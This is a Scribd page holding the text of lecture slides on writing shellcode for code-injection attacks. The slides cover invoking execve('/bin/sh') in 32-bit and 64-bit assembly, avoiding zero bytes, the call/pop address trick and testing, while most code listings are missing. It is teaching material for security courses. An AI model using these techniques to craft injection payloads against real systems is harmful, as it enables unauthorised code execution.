Scribd
Upload
6 views33 pages

S09_Shellcode

The document discusses the challenges of writing shellcode, which is often used in code injection attacks to gain shell access for executing arbitrary commands. It outlines two approaches for creating shellcode in both 32-bit and 64-bit formats, detailing the assembly programming techniques and methods to avoid zeros in the code. Additionally, it covers data preparation and compilation/testing processes for effective shellcode execution.

Uploaded by

Nayla Greige
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
6 views33 pages

S09_Shellcode

The document discusses the challenges of writing shellcode, which is often used in code injection attacks to gain shell access for executing arbitrary commands. It outlines two approaches for creating shellcode in both 32-bit and 64-bit formats, detailing the assembly programming techniques and methods to avoid zeros in the code. Additionally, it covers data preparation and compilation/testing processes for effective shellcode execution.

Uploaded by

Nayla Greige
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 33

Shellcode

Outline
• Challenges in writing shellcode
• Two approaches
• 32-bit and 64-bit Shellcode
Introduction
• In code injection attack: need to inject binary code
• Shellcode is a common choice
• Its goal: get a shell
– After that, we can run arbitrary commands
• Written using assembly code
Writing a Simple Assembly Program
• Invoke exit()

• Compilation (32-bit)

• Linking to generate final binary


THE BASIC IDEA
Writing Shellcode Using C
Getting the Binary Code
Writing Shellcode Using Assembly
• Invoking execve(“/bin/sh”, argv, 0)
– eax = 0x0b: execve() system call number
– ebx = address of the command string “/bin/sh”
– ecx = address of the argument array argv
– edx = address of environment variables (set to 0)
• Cannot have zero in the code, why?
Setting ebx
Setting ecx
Setting edx
• Setting edx = 0

xor edx, edx


Invoking execve()
• Let eax = 0x0000000b
Putting Everything Together
Compilation and Testing
GETTING RID OF ZEROS FROM SHELLCODE
How to Avoid Zeros
• Using xor
– “mov eax, 0”: not good, it has a zero in the machine code
– “xor eax, eax”: no zero in the machine code
• Using instruction with one-byte operand
– How to save 0x00000099 to eax?
– “mov eax, 0x99”: not good, 0x99 is actually 0x00000099
– “xor eax, eax; mov al, 0x99”: al represent the last byte of eax
Using Shift Operator
• How to assign 0x0011223344 to ebx?
Pushing the “/bin/bash” String Into Stack
• Without using the // technique
ANOTHER APPROACH
Getting the Addresses of String and ARGV[]

Pop out the address


stored by “call”

…. code omitted …

This address is
pushed into stack
by “call”
Data Preparation
• Putting a zero at the end of the shell string

• Constructing the argument array


Compilation and Testing
• Error (code region cannot be modified)

• Make code region writable


64-BIT SHELLCODE
64-Bit Shellcode (elf64)
A Generic Shellcode (64-bit)
• Goal: execute arbitrary commands

• Data region List of commands


Data Preparation (1)
Data Preparation (2)
Machine Code
Summary
• Challenges in writing shellcode
• Two approaches
• 32-bit and 64-bit Shellcode
• A generic shellcode

You might also like